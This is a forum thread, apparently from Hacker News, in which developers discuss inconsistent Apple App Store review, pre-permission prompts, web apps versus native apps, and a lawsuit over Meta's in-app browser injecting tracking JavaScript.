Yes, I understand why Apple doesn't pull FB/IG/WA/Uber/etc but as a smaller developer it's incredibly frustrating to have the full rules applied to me but not the big players.
A week or two ago I had to fight with app review over some functionality that was behind a login screen (they thought it should be public, I disagreed) and for my pre-permission-request screens (you know, the screen almost every app shows before firing the system prompt). Turns out you can have that screen but you can't ask a question on that screen or offer a way to dismiss and not get the system dialog. That was news to me since I had seen countless "Do you want to enable push notifications (yes|no)?" screens in top apps but that rule has changed and no longer allows you to pre-ask. I complied but the very next day I opened an app from a billion dollar company and I got a pre-ask that I was able to dismiss without popping the system dialog. wtf...
Why am I expected to bend over backwards for app review when these serial abusers get a free pass (no ban AND they can do things smaller apps get slapped down for)?
I know the answer is "money" but I fucking hate it.
> but that rule has changed and no longer allows you to pre-ask. I complied but the very next day I opened an app from a billion dollar company and I got a pre-ask that I was able to dismiss without popping the system dialog. wtf...
Apple enforcement on rule changes has several different options:
a) only applied to new apps
b) only applied on next app submission
c) app will be removed on date unless it's fixed
This sort of change seems likely to be in category A, and then over time will be in category B and eventually the billion dollar apps will get an update denied until they fix it. They may drag their feet a little or a lot first.
Some of the subjective review things will get flagged only sometimes, so you might get through if you resubmit with no changes, or if you only address some of the requests. Inconsistent enforcement is frustrating, of course.
I know this is the case for certain changes such as allowing users to delete their accounts. I remember the new apps/updates being bifurcated with updates being allowed for a few months after it went into effect for new apps but for this system dialog change I'm not aware of anything being said publicly about this, I think the rules just changed internally. My google-fu might be failing me but I can't even find articles about this change. It was news to me (it's in the HIG, not in the guidelines) when we got hit with it and normally I keep abreast of any new requirements/rule-changes and when they go into effect.
I completely understand and agree with the different options you outline but I don't think that was done in this case, at least publically. Please, if I'm wrong and someone has a link to an article about this I'd love to see it/know about it.
That might be a viable path if not for push notifications and the fact that companies want an app more than anything. I've used cross platform frameworks in the past and had the web version up and all I hear is "when app?", even though it's the same codebase, same look, sometimes without even leveraging anything like push notifications or other app-only features. They literally will not even look at the web version. I've proven this over 10+ different companies. I deliver the web version, then I get started on app store hell and only after the app (iOS is all they often care about, at least at the start) is out do they start giving feedback. It's frustrating since they normally have had access to the identical web version for weeks but they just don't care.
I love the web, but users and companies just want apps, and I want to get paid.
Push Notifications will arrive next year. As will one-click install. A PWA can accept payments via Apple Pay. Yes, monetization is more challenging with a web app, but ultimately your value proposition is about how many eyeballs your app has - so the faster you can get to many eyeballs the better.
As for building apps for clients - I find just the opposite to be true. They don't want to be subject to the whims of the review process. They just want to deliver their service to their users.
What users think is not really relevant. They'll use it if they have to or if their friends are using it.
I haven’t tried sending push notifications to iOS over web yet but this should be possible since iOS 16 [1] because they introduced “web push”. According to Apple, it works cross-browser, even if the browser was killed by the user, and you are not required to have an Apple developer account.
That feature isn't coming out till 2023 in a later iOS 16 release. We will see if that moves the needle but like I said in a comment below [0], even when push notifications aren't part of the conversation companies still just wants apps.
It didn't though. Steve Jobs’ vision of simple web applications was realised with the first iPhone. Native applications added to that, they didn’t take it away.
This idea that web applications only “count” if they can send push notifications is bizarre. You know everybody was building web applications just fine without push notifications before 2009, right? And that native iPhone applications didn’t have push notifications either to begin with?
Just because Apple added push notifications to native iPhone applications, it doesn’t mean that all web applications suddenly ceased to be “real” applications because they couldn’t do it yet.
I mean even Jobs turned around pretty quickly on the idea of PWA. I doubt even he championed it after iOS 2+.
I'm still not sure if the PWA push was the plan and they changed to the app store or if it was always something to tide people over. I believe the reporting has said they honestly thought PWAs would be good enough and then reversed course but it didn't take them long before they just went all-in on apps.
All that said I'm not really a "the web should be able to do everything apps can do"-guy, I think the constant permission requests would be incredibly tiring while browsing the web. Though maybe you, as a user, would need to first "promote" or "whitelist" a url before it could even ask. Idk, just sounds like hell.
The problem is that Apple isn't investing in a platform for everyone. As such, they're liable to get their ass whooped by antitrust suits time immemorial until they either -
1. Make the web a suitable platform for application delivery
- or -
2. Allow third-party alternatives to the App Store
Apple doesn't like it. No shit, their shareholders would throw a riot if they abandoned their 80-billion/year cash cow. Unfortunately, that exploitation is a very real consequence of first-party vendor abuse that we shouldn't have allowed to happen in the first place. Microsoft tried making the web into their "App Store" a few decades ago, and they were rightfully sued into oblivion and beaten with rolled-up newspapers. We should have done the same thing to Apple before they became so self-entitled.
If you don't want to use the web for apps, then don't. I'm sure Apple would be happy for you to spend that money on the App Store instead, where they can happily take their cut. But consumers need the option. That's just not up for debate. Apple will kick and scream and make it as ugly as possible, but that's purely because they're facing technologies that threaten their business model as they know it. How long can they continue to do this before the dam bursts?
Interviewer at Generic iOS Contractor Co.: “OK, we’ll hire someone else.”
*Interviewee exits, pursued by a door*
Interviewer: “HR? Yes, please make a note not to offer that candidate any other roles, thanks. Yeah, for some reason they seemed to think their personal preferences were more important than solving our customer needs. Would be a terrible fit.”
Christ on a bike, I was being facetious, but if you tried that argument in a job interview as a reason why the job on offer was inherently wrong I would call security so someone could watch you at all times while making sure you left.
Places which make me feel the way that you’re describing, I don’t even reply to the recruiter.
Drives me nuts that even just websites, like Reddit, push so hard to get you to install their app.
I think it is not primarily related to notifications and telemetry, although that's obviously part of it, or to access to your contacts or whatever, like in the case of FB. My theory is that it's much simpler and dumber than that: that "number of app installs" has simply become a metric that managers can use to promote themselves inside a company, and that companies can ultimately use to sell shares. It's an engagement metric, and since there is no metric for "home screen bookmarks made", there is no way for companies and managers to gamify the web site. Therefore, they simply don't care about the website, except as a means to get you to install the app. It's all a bullshit numbers game.
Because web-based apps don't have a good user experience. Even a web app embedded inside of native app feels bad. Maybe it's something about WebKit specifically that feels bad, but there is a very noticeable difference between a web app and a native app. Part of the issue is the thread model. Touch events come in on the app's main thread, and then those touch events get dispatched on to the JavaScript thread, and then the JavaScript thread needs to dispatch to yet another thread to render. It's just impossible to achieve native-level touch interactions in a web-based app.
And then there is there is the polish level. Apple has spent god knows how long polishing each and every native interaction. All the animation curves are perfect. You lose all of that polish when you build a web app.
It's not for telemetry (at least at the scale/size of companies I deal with). As far as I can tell it's the prestige. I know this because our initial app had no push notifications and the clients who paid for it wouldn't stop asking about an app and didn't even touch the (identical) web version.
Push notifications are part of it for sure but I just wanted to give an example of a case where there were no features that were app-only but all they cared about was the app. I'd say "Yeah, we have that new feature and you can see it at yourbrand.ourcompany.com" and they'd say "Ok, when will we have an app?", felt like I was taking crazy pills but I've seen this exact same conversation repeated at multiple companies, multiple clients. And lest someone thing this is a subdomain-related thing, it's not, I had the same questions when we setup the web version at theirdomain.com.
AFAIK this is a bunch of the most common reasons, somewhat ordered from most-important to least-important.
1. It puts an icon on your phone's home screen which reminds you it is there and encourages reuse.
2. They can put notification counters on said home-screen icon.
3. It is generally easier to convince people to enable notifications on the app than on the website.
4. User perception. Some users expect an app and look down on a website. (Even if functionally identical)
5. Blocking ads on websites is much easier than blocking them on mobile.
6. It can provide better tracking and analytics.
7. The app can provide a better experience.
7a. The ability to pre-download the application makes it less costly to provide more features and code. The just-in-time downloading of web applications means that the size of code, data and resources generally needs to be more carefully considered. Of course you can do careful code loading for webapps but it requires custom code instead of being managed by the store.
7b. Native apps generally have access to more APIs especially without needing to request special permission (contacts, device sensors, large amounts of storage, etc)
7c. Access to native UI toolkits can make the application fit into the expected UX better.
Apps are easier to use than a browser. The flow of installing an app from the app store, and having an icon on the home screen, makes a lot more sense than opening a browser and navigating to a URL.
Also, an app is there, with an icon on the home screen to remind the user of its existence. I think this makes future use more likely than if the user just entered the address, and even more than with a bookmark that is visible only in the browser.
I know the users can create the icon themselves by saving a bookmark to the home screen, but for some reason they seem not to.
I've switched to working on other kinds of apps, more rich desktop kinds of apps. I enjoy this a lot more too since most mobile apps are pretty dumb and gimmicky.
Of course if you're doing client work you have to build what your clients are asking for and yeah the web is not a substitute for native in all cases.
It seems that the golden age of apps is comming to an end. One of my many apps gets banned daily by Google due to some silly rule interpretation, which among them include what seems to be punishment for using an ad provider different from AdWords or whatever they call it now.
Right but that was just their enterprise cert and didn't affect their big apps, only internal apps and their gross VPN apps (which they were distributing via enterprise cert to get around app review).
> Turns out you can have that screen but you can't ask a question on that screen or offer a way to dismiss and not get the system dialog. That was news to me since I had seen countless "Do you want to enable push notifications (yes|no)?" screens in top apps but that rule has changed and no longer allows you to pre-ask.
We regularly (multiple times per month) launch new applications in new Apple developer accounts where we present a screen explaining what notifications we send and two buttons, one of which says “Notify me” that triggers the system permissions prompt, and one of which says “Not now” and continues without triggering the system permissions prompt.
I’m not sure of the precise difference Apple sees between what you are doing and what we are doing, but this is not a roadblock for us, so perhaps copy that approach more closely and Apple will relax a bit?
I'm in the exact same boat as you. It's a whitelabel app that we have launched many times in the past on new Apple Developer accounts but we just randomly got hit with this. Our screen also said "Enable Location" or "Not now" but that wasn't satisfactory. If you look at the "Pre-alert screens" section of this HIG document [0] you will see even your way of doing it isn't allowed but with all things app review, it's a game of roulette if the reviewer notices/cares. I've run into this before where I set up 2 apps within days of each other, different accounts, same core base base, and one gets dinged in review and the other doesn't.
I've shipped new apps that didn't have the ability to delete user data well after Apple's deadline and some sneak through ("sneak" but I wasn't trying to sneak, I just forgot to add it to one of my apps, I quickly added it in the next update so I didn't run into a brick wall later if they noticed) and some are caught.
I have to admit my bias up front -- as a user, I hate pre-alert screens in general. But this wording:
> Our screen also said "Enable Location" or "Not now"
is one of my pet peeves. It's that "not now" that does it for me. The lack of a "No" option, and having a "not now" option, is a big red flag to me. At best, it's just manipulative. At worst, it hints that I'm going to keep getting asked about it over time.
Either way, it's removing the ability to say "no", which feels scummy.
Exactly this thing triggers me as well. If you have "Not now" option, give us "Not ever" option as well. Or have you ran out of buttons?
Same with "No, thanks" button on dialogs that are expected to be denied most of the time (plz subscribe to our newsletter). Sometimes I wish there would be a "No, f*ck off" button next to it, but I feel it's kinda the developers loss for not willing to collect sentiment feedback. Or just give me "No" button, but I am not thankful for being forced to dismiss your nagging.
It’s understandable to feel that way, but it tells the user that this decision doesn’t have to be permanent and makes it easier to say no if they aren’t sure. Remember that if you say no to the system permissions prompt then it can’t be shown again, and this is embedded in a lot of people’s brains – “use it or lose it”. “Not now” is a way of taking the pressure off to stop them getting stuck on that screen, and also pretty idiomatic at this point.
Apple are definitely inconsistent in how they apply their rules but we’ve never had to tweak this screen as far as I know, across several hundred applications. Maybe it was a one-off?
In my experience, Apple don’t really reject things based on the HIG any more. Last time they did for me was back in 2008. If they rejected things based on the HIG, they’d reject almost everything – look at how many applications abuse launch images to show a splash screen, for instance.
Agreed. I supported a relatively large retail app (about a million users) with a team of 5-8. Apple review process was always a risk. I've had times as well where my submission was denied, but in the appeal process would point to a larger app that did the same thing and it would rarely help.
The reply I got when I pointed at other apps was "Please file a report via the App Store, other apps not following the rules doesn't give you a free pass". :rolleyes:
I also once got told (on the phone with a reviewer) that I couldn't say
Allow "My App" to use your location?
In the title of the permission dialog because I was "leading" the user to allow. Never mind that the title of that dialog is system-generated and you can only edit the description that shows underneath. I went 3-4 rounds with the reviewer saying I didn't control that while they insisted I did/could. I finally gave up, made 1 other change they requested, then resubmitted and it went through. Reviewer roulette sucks.
I know you are trying to be helpful but I can't stop laughing. There are no "relevant authorities", it's Apple/Google's way or the highway. Even if there were "relevant authorities" I don't have the funds/time to buy the justice I want.
I just got back from a trip were I was visiting a lot of older relatives and everyone of them now has a iPad that about 40-70% of their usage is FaceBook. In a battle between Apple and Meta I honestly wonder who would blink first but my money would be on Meta. Apple has already made their money and the primary FaceBook audience isn't rushing out to buy a new iPad every year, where as losing complete access to the Apple market would immediately have a huge impact on Meta's bottom line.
Counter argument - small apps _usually_ have much more trackers, coming from many different sources. As a result, your data is syphoned to many dozens of entities, and each of the faces less scrutiny than FB/IG.
Small apps should face less scrutiny than billion dollar companies. It's much easier to regulate Segment, Google and Facebook than doing it to every small business in America.
From regulations point of view - sure. Which is also the reason why big tech is general better with privacy, as weird as it may sound.
If you care about privacy, small apps are much more dangerous (on average of course).
Have you seen data practices from smaller data brokers vs big tech?
Big tech uses your data, but they try to protect it (with various levels of success), as it’s more valuable to them. Small data brokers literally sell everything (and not like big tech, where they sell you services that utilize it, but raw data) they can, directly, to anyone.
That sounds like what Google's PR department would say, right before their lobbying arm turns around and promotes a data privacy law that absolutely obliterates citizen rights. The smaller data broker can't afford the privacy-compromising lobbyist department, so I would still rate them less dangerous for privacy overall. I'm not even sure the big companies do a better job, it's certainly more damaging when it goes badly (e.g. Equifax)
> or offer a way to dismiss and not get the system dialog.
I wish it was applied fairly, but I am thankful for that rule, because it reduces the amount of “soft requests” where the app will continue to pester me relentlessly about enabling access to my contacts or something
I see both sides here. It'd be different if I didn't hear from clients/users about how they can't get push/location/etc feature to work only to find out they dismissed/denied the initial request. I have code I move from project to project to handle the soft-request and to handle the "you denied the system request, let me guide you to where you need to go in settings to fix this". Turns out my soft-request code goes against the rules (ok, that's fine, I just with it was constant) so I'll remove that but getting only 1 try to request is rough (though I agree it would be worse if apps could request that an unlimited number of times). I don't know what the good middle ground is here, maybe 1 request is the middle ground.
I actually specifically decided not to start any app companies because of the risk inherent with being on the App Store. Apple wield their power to heavy handidly. I’ve been affected by it at my last couple of jobs where apple just stonewalls or otherwise makes a complete mess of trying to get something in the App Store. It’s too much platform risk. They’re starting to push innovators away.
Imaging myself getting the same treatment as Facebook - as an indie dev, I prefer my app to get rejected rather than deal with a lawsuit of that magnitude. Complying with App Review guidelines is a small effort, after all.
> Removing text seems like an incredibly minor change request.
Can you expand on this? I'm not exactly sure what you mean. To clarify, I had 2 issues:
* App review thought part of my app should not be being a login screen, the data on this screen was fetched via our API was was authenticated (not a super easy change to expose that and we don't expose it to unauthed clients on purpose.
* Our app asked the user if they wanted to allow location access to see nearby stores on our map page (only asked when they went to the map page). We didn't pop the system dialog unless they agreed first to our own permission prompt (since you can only pop the system dialog once). This is against the rules now, which is fine, my frustration stems from continuing to see this practice everywhere.
> This is against the rules now, which is fine, my frustration stems from continuing to see this practice everywhere.
This kind of sounds like being mad that the cop pulled you over for speeding, despite everyone else also speeding. I know it sucks and it feels like you're being singled out, but generally "everyone else is breaking the rule, too" has never been convincing to rule enforcers.
I worked at a company that always tried to walk the line right up to the edge of Apple's rules, and unsurprisingly kept running into trouble with app reviews. The company kept wanting to dig in and fight because "our_competitor does the same thing". My advice was always that it's pointless, and we'd be better off just concentrating on our app and fixing it.
At this point in my career, I almost feel like I could make money simply being an "AppStore Rules Consultant" who flies into a company, says "Just Do What Apple Said In Their Message!" and take home my fee.
> This kind of sounds like being mad that the cop pulled you over for speeding, despite everyone else also speeding.
It's a little closer to being pulled over in a Honda Accord with 200K+ miles on it going 71 in a 70 zone while Tesla's and BMW's fly by at 90+. Also those Tesla/BMW owners have had hundreds of tickets but somehow keep their licenses.
Yes, I know this is actually probably completely/near accurate to the real world, money runs everything, but it doesn't mean I have to be ok with it. I'm not advocating I should be allowed to "speed", just that it's frustrating to be the only one getting pulled over with (ok, I've stretched this metaphor as far as I can stand) a tiny dev team while billion/trillion dollar companies, for which my entire team is less than a rounding error, get away with murder.
The problem is that the rules are enforced differently based on the reviewer you get, and how s/he feels that day. This is blatantly obvious after time dealt with reviewers for more than 3 submissions.
So that cop who pulled you over? Did he have a bad day with his wife that morning? You’re getting a ticket. Tomorrow? Possibly not.
> This kind of sounds like being mad that the cop pulled you over for speeding, despite everyone else also speeding. I know it sucks and it feels like you're being singled out
It's different when every single app gets a review and these behaviors can be controlled at a bottleneck.
Your analogy is more apt if Apple decided they would only display websites that did X. And websites might pretend to do X for a little while, and then quit. And there's billions of them, not enough enforcers, and no simple bottleneck where they pass/fail BEFORE being released.
It might be if your only language is English. If not, it requires going back and getting translations done again. And it's not necessarily as easy as just removing the offending text. Text is very contextual, and the removal of some text might necessitate changing other text.
I'd not want to suggest that something is "minor" in a system I'm not familiar with.
A little while back I recall some pundit describing Facebook as believing that this kind of data was theirs. Not “theirs for the taking”, but literally if they could find a way to obtain it, they considered it their right to have it. Like it was baked into the culture of the company. The more I read about Facebook’s practices, the more it rings true.
IIRC, Facebook got its start by scraping student data from university servers. If so, the belief that any data it can get its hands on is fair game pretty much is the foundation of the company.
Zuckerberg and a lot of tech/SM CEOs have a strong "rules for thee, not for me" vibe when it comes to personal privacy. One day they'll claim "privacy is outdated" or "a matter of context" in relation to their business, and the next they'll spend fortunes to protect and insist on personal privacy for their family and themselves. One can only imagine that billions they make do a lot to paper over the ethical void at the heart of many of the businesses under their control.
They act like classic spies. Spies will eagerly take all data they can touch, but loath giving any data about themselves. Personally I think this superficial similarity reflects a more meaningful underlying truth: Facebook, and several of the others, are in fact a commercial branch of the US intelligence apparatus.
There was a belief for a time that consumers no longer cared about privacy, that the millennial generation preferred to share everything, and harvesting data was fine because the concept of privacy was antiquated.
What surprised a lot of tech execs was that when people understood how much data was collected they got creeped out and when given the option to opt-out of data collection they agreed at very high rates.
Apple's move to limit in-app tracking was genius because any lawsuit from FB or similar is counter-productive - consumers are given the option and they opt out at 99%. Suing Apple to force them to let FB track consumers would be a PR disaster.
>There was a belief for a time that consumers no longer cared about privacy, that the millennial generation preferred to share everything, and harvesting data was fine because the concept of privacy was antiquated.
It's not like this is wrong. If you give consumers the choice of paying $5/month directly for some service vs. providing $5/month in personal data then they'll pretty much always choose the latter - I don't believe this has changed.
What has changed is that now third parties are better-able to disrupt companies from Meta from silently harvesting personal data as a default, and consumers generally don't mind this because they see the result as them getting to use the data-harvesting websites for free. Just like they're happy to use adblockers even if that collectively results in sites having to use heavy-handed subscription policies. If you give people the option to free ride, it's not surprising that they do it.
Anecdotally every non-tech person I know gives literally zero Fs about their data/privacy. They're FAR more annoyed by the cookie / tracking pop-ups than what they represent, and would generally opt to just be tracked everywhere than be annoyed with the question. I'd also say that the majority of my tech friends feel about the same, and do not care, and have the "I have nothing to hide / who cares if they see my boring life" attitude.
What about if you film them in public? I’m sure those same people would care a lot, they just understand things differently. If there was more of a sensory experience to having your data/privacy invades, such as someone putting a camera up to your face - then non-tech people would get it.
Depends what you mean by that. If you mean someone in their face with a camera or microphone. Then, yeah I'd agree they would be upset. However, pretty much everyone walks into stores daily that record video/audio, and have signs informing people of it. No one seems to care.
Have you ever read Yurtle the Turtle by Dr. Seuss? It’s the story of a turtle who considered himself “the king of all that I can see,” and kept building a tower of turtles higher and higher to see more, and thus rule more…
Ironically, if Yurtle had used the metaverse, he could have kept the illusion going indefinitely and would have remained happy. While the other turtles could have gone happily about their daily lives, because it turns out they never needed a king and all he did was burden them with his vanity projects.
I think we can apply this in real life with advanced AI bots, from whom Metas advanced scraping software can gather data which can then be used to show the bots relevant ads.
Of course it's baked into the culture of the company. The CEO famously called his users "dumb fucks"[1] for trusting him with their data. As far as I'm concerned there's no reason to think his basic attitude has changed. Just the messaging has gotten better.
> The CEO famously called his users "dumb fucks"[1]
The sourcing for that claim is extremely poor. The Esquire article links to a Business Insider article from 2010, which in turn cites "anonymous sources" on a 2004 IM conversation:
> According to SAI sources, the following exchange is between a 19-year-old Mark Zuckerberg and a friend shortly after Mark launched The Facebook in his dorm room
If an app needs a webview, it should always strive to open that view in an embedded Safari webview (called an SFSafariViewController) or link to the view in the user's own choice of browser.
The app is prevented from seeing ‘inside’ this view.
Sometimes an app needs to control some aspect of the external view - for instance listen to some Js event, or inject authorization - and this can be for totally legitimate reasons in the flow of the app. Then the application needs to use another type of embedded webview called a WKWebView, which by definition allows the app to see into the user's interactions in the embedded browser.
Most developers and apps use these for totally necessary reasons - but Facebook is deviously abusing this functionality.
Some of the posters in this thread are blaming Apple for Facebook's evil behavior, but a lot of totally legitimate functionality that needs this type of app/browser communication would be impossible without the ability to enable it for genuine and well-founded reasons.
If "skirting Apple privacy rules" amounts to opening a web link, then it absolutely is Apple's fault. If Apple provided SFNextPaymentsInformationExporter, and a malicious app used that nefariously, and then the app was approved, that's entirely on Apple.
If Apple wants to advertise security and privacy, as well as enforcing App reviews, then I consider that to be enough to hold them accountable if they fail their advertised promise. Apple did not respond by removing the offending app from their store either.
> The Facebook app gets around Apple privacy rules by opening web links in an in-app browser, rather than the user’s default browser, according to Wednesday’s complaint.
Just like Google getting fined, not even Facecbook (Meta) should be allowed a pass on trying to escape this evasion and continuing to violate user privacy and collect more personal identifiable information (PII).
As soon as they lose, they should be fined in the multi-billions of dollars again, much higher than the FTC fine that they got years ago.
Given that they won't ever change, the fines should just get higher.
>> The suits are based on a report by data privacy researcher Felix Krause, who said that Meta’s Facebook and Instagram apps for Apple’s iOS inject JavaScript code onto websites visited by users. Krause said the code allowed the apps to track “anything you do on any website,” including typing passwords.
Does it mean that Facebook can exfiltrate users’ passwords for any website?
I've only ever used Android, so I'm ignorant here to how iOS operates and, to a certain extent, the rules Apple has in place around this sort of thing. I would think, though, that this sentence is key:
>The Facebook app gets around Apple privacy rules by opening web links in an in-app browser, rather than the user’s default browser, according to Wednesday’s complaint.
If FB is supposed to follow iOS settings by opening links in the default browser set by the user, but is intentionally not doing that here so that they can maximize the data they collect, then yeah they'd be breaking rules.
> If FB is supposed to follow iOS settings by opening links in the default browser set by the user, but is intentionally not doing that here so that they can maximize the data they collect, then yeah they'd be breaking rules.
Users can't set a default browser on iOS. Apps can choose to open URLs in one of two in-app webviews (the old WKWebView or the newer SafariViewController), or they can use the "universal links" option to allow the system to open a URL (which can be redirected to another native app, should one be available to handle the domain). While SafariViewController is more full-featured (it forces the use of the system default share control and shows the URL), a lot of sketchier apps prefer to use the older WKWebView (where they can better customize the UI, hide system default controls, and hide the URL). Since WKWebView hides the URL, you can somewhat transparently route users through tracking domains (something I already observed Twitter doing), which may also be the vector Meta is using to inject JS.
All this said, the visual customization of WKWebView also has a legitimate use: many apps use it for showing regular in-app screens, not just for an internal browser.
Well-made third-party apps (Tweetbot for Twitter, Apollo for Reddit) generally let the user choose between SVC or just letting the system handle the URL, because they're not interested in monetizing user data in the same way.
That’s just the app itself, not the actual browser engine - under the hood it’s still WebKit (what Safari uses) and not Chrome or any other browser engine: https://en.m.wikipedia.org/wiki/WebKit#Use
iOS doesn’t allow anything other than WebKit webviews described above. Android does support others, but that’s a different story.
That's not what the question/context was -- it was specifically talking about which app (e.g. Safari, Chrome, Firefox, whatever) is used to open links from apps.
No clue why I was downvoted for saying that, which was a perfectly valid answer in that context.
The "in-app browser" is Safari, not their own rendering engine (Which is explicitly disallowed.) The difference between in-app safari and external...is that the app can get callbacks for every link tapped within the in-app browser, and the app itself can inject javascript into each web page it loads, which essentially means unlimited perfect tracking for social networks (Since the user is already logged in to the app.)
This sounds bad...but the integrated webview is necessary for things like Cordova/Ionic/React Native/etc to exist on the platform. It's also a byproduct of iOS's pre-multitasking days where launching out to Safari was a big context change, vs now where you can just swipe back to the app you were in.
Can Apple really enforce what goes on in an app? Probably only by rejecting it from the app store, but that's risky on Apple's part and would cause a lot of user complaints.
To a point; they control all the interfaces, which is why an app like Facebook cannot access your photos, location or address book without your explicit permission.
And Apple has gone for the nuclear option of removing apps from the store; not long ago they booted Fortnite, one of the big earners (billions in revenue of which Apple got a percentage through their commissions), after they added a means to circumvent the app store fees, starting a long proceeding into getting it lowered or dismissed entirely - partially successful in specific jurisdictions.
Apple should change the rules to reject apps that try to open links in an in-app browser instead of sending the user to Safari.
Maybe as a workaround let Meta put up their own browser on the app store and make it possible for a user to choose to let let the FB app send links to the Meta browser for someone who really wants this behavior.
But don't allow the FB app to do this with no way for the user to stop it.
Chrome for iOS seems to exist for exactly the same reason, to provide a way for google to track users.
Facebook would just argue user experience - which is true, users do prefer to stay in the app. Users don’t really understand this behavior, however. I’m sure there have been users that have opened links in FB, then decided to go log into their bank on the same session.
If apple were to address this, they might end up monitoring the inapp browser and prompting for the user to hop out into safari depending on the url. As of now, apps like FB discourage reopening sessions in safari. The worst ones are like LinkedIn which requires like 2-3 key presses to reopen in safari. It’s clear these apps have an incentive in keeping users within the inapp browser
I hate that Facebook has to abuse the freedom of injecting Javascript into WebViews. This is why we can't have nice things.
I fear that this will lead to an overreaction from Apple that results in blocking or severely limiting this feature, which will be a huge issue for apps that depend on it for legitimate reasons.
Facebook would just argue user experience - which is true, users do prefer to stay in the app. Users don’t really understand this behavior, however. I’m sure there have been users that have opened links in FB, then decided to go log into their bank on the same session.
If apple were to address this, they might end up monitoring the inapp browser and prompting for the user to hop out into safari depending on the url. As of now, apps like FB discourage reopening sessions in safari. The worst ones are like LinkedIn which requires like 2-3 key presses to reopen in safari. It’s clear these apps have an incentive in keeping users within the inapp browser
I saw an article recently where an FB spokesperson was arguing—albeit in an indirect, fluffily-phrased way—that in order to be able to only track you in the places X where they're allowed to and not the places Y they're not allowed to, they need to track you everywhere (X+Y) to know if you're in X. That way, presumably, they can be sure to not track you in X.
Couldn't Apple's ATT be enforced at a technical level, giving poisoned information such as XPrivacy did in its heydays, or by preventing JS injection in webviews?
Eh, if they're going to do that I'd rather they just force developers to use normal Safari for external links. It'd be easier to verify and I'd get to finally keep my cookies and not log in to news sites for the 100th time.
Apple could still targhet specific endpoints deliberately for repeeat offenders also in the normal Safari.
They could have a privacy feature (default on) which blocks or poisons specific endpoints on specific hosts belonging to e.g. Meta, Alphabet, ByteDance.
Apple are in a unique position here to protect users' privacy since they control the browser of so many. It's unfortunate that they also have their own advertising agenda so any steps they take will always be scrutinzed as being anti competitive and simply making their own ads more profitable. But I'd still want Apple to pull the trigger on more drastic measures like these. The last round of privacy isolation should just be the start. I'd love to see apple e.g. block Facbook ads inside the facebook app and refer to privacy concerns and only unblock them if Meta follows all privacy guidelines elsewhere.
Let me get this straight, they are serial offenders and apparently incapable of even realizing that they're doing wrong. Any non-rich person would at least end up in psychiatric care for something like that, but we let these psychopaths run free?
I like this. This is competition. Apple is drawing Facebook out. I like both companies but the incentives of any trillion-dollar company are very fucked and it helps Facebook internally when they get sued for breaking the rules. Let he without sin cast the first stone, everybody breaks some rule at some point, it's original sin and inescapable. Even saints sin, they just also atone. This helps Facebook's angels on its shoulder speak up with bigger numbers--which is the name of the game--and drown out the devil on the left. Like wouldn't it be good for--extreme example--Judas if he put a price of thirty pieces of silver against betraying Jesus? That mitigates temptation.
Slaps on the wrist are harmful especially for those receiving slaps on the wrist. No moral development.
How does this apply to a FAANG company? Nobody knows--better than another FAANG company. Yes they know each other yes they hire each other's employees yes cross-polination yes yes yes--but they also compete. And when they hold back on competition, they at least do the public the favor of doing so at a very high cost--like Apple taking $20,000,000,000 from Google in exchange for not entering the search engine market. So there the higher the price extolled, the better for the public. The higher the price, the harder for Google to pay it to avoid competition, and the more likely it will not be paid which leads to competition.
In practice every FAANG company competes against all the others on everything. This is a success! Google can't beat Apple on smartphones, and Apple can't beat Google on search (even if they wanted to), so both companies have money, so they duke it out in every battleground beyond their moat. If they don't have a moat, however, they go to shit and can't carry out that competition in every other field.
A week or two ago I had to fight with app review over some functionality that was behind a login screen (they thought it should be public, I disagreed) and for my pre-permission-request screens (you know, the screen almost every app shows before firing the system prompt). Turns out you can have that screen but you can't ask a question on that screen or offer a way to dismiss and not get the system dialog. That was news to me since I had seen countless "Do you want to enable push notifications (yes|no)?" screens in top apps but that rule has changed and no longer allows you to pre-ask. I complied but the very next day I opened an app from a billion dollar company and I got a pre-ask that I was able to dismiss without popping the system dialog. wtf...
Why am I expected to bend over backwards for app review when these serial abusers get a free pass (no ban AND they can do things smaller apps get slapped down for)?
I know the answer is "money" but I fucking hate it.